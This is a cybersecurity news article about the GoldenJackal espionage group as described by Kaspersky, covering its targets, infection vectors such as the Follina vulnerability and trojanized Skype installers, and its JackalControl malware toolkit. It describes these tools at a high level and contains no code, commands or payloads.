A new sophisticated, persistent threat actor known as GoldenJackal is aiming its attacks against Middle Eastern and South Asian governments and diplomatic organizations. The opponent has been seen since mid-2020 by the Russian cybersecurity firm Kaspersky, which described it as both competent and sneaky.
The effort primarily targets Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with malware specifically designed to steal data, spread between PCs through portable drives, and carry out monitoring. Although little is known about the organization, GoldenJackal is thought to have been active for at least four years. Even though the actor’s modus operandi implies an espionage intent, Kaspersky claimed it has been unable to establish the actor’s origin or association with recognized threat actors.
Additionally, the threat actor’s efforts to maintain a low profile and vanish into the background have all the telltale signs of being a state-sponsored organization. However, significant tactical similarities have been found between the threat actor and Turla, one of Russia’s elite nation-state hacking crews. In one instance, GoldenJackal and Turla infected a target machine two months apart.
It is currently uncertain how exactly targeted machines were breached; however, the evidence has pointed to malicious Microsoft Word documents and trojanized Skype installations. The Word files have also been seen weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware. At the same time, the installer acts as a conduit to distribute the .NET-based trojan known as JackalControl.
As the name implies, JackalControl allows remote commandeering of the device, arbitrary command execution, as well as uploading and downloading to and from the system. The following are a few different malware families that GoldenJackal has used:
- JackalSteal – an implant that searches for important files, including those on removable USB drives, and sends them to a remote server.
- JackalWorm – a worm designed to install the JackalControl malware on PCs through detachable USB drives.
- JackalPerInfo – a malicious program with the ability to gather information about the system, folder contents, installed programs, active processes, and login credentials kept in online browser databases.
- JackalScreenWatcher – a utility for taking screenshots depending on a predetermined time interval and sending them to a server under actor control.
Another noteworthy characteristic of the threat actor is its dependence on compromised WordPress websites as a relay to pass web requests on to the real command-and-control (C2) server through an inserted malicious PHP file. “The group is probably trying to reduce its visibility by limiting the number of victims,” said Giampaolo Dedola, a researcher at Kaspersky. “Their toolkit seems to be under development – the number of variants shows that they are still investing in it.”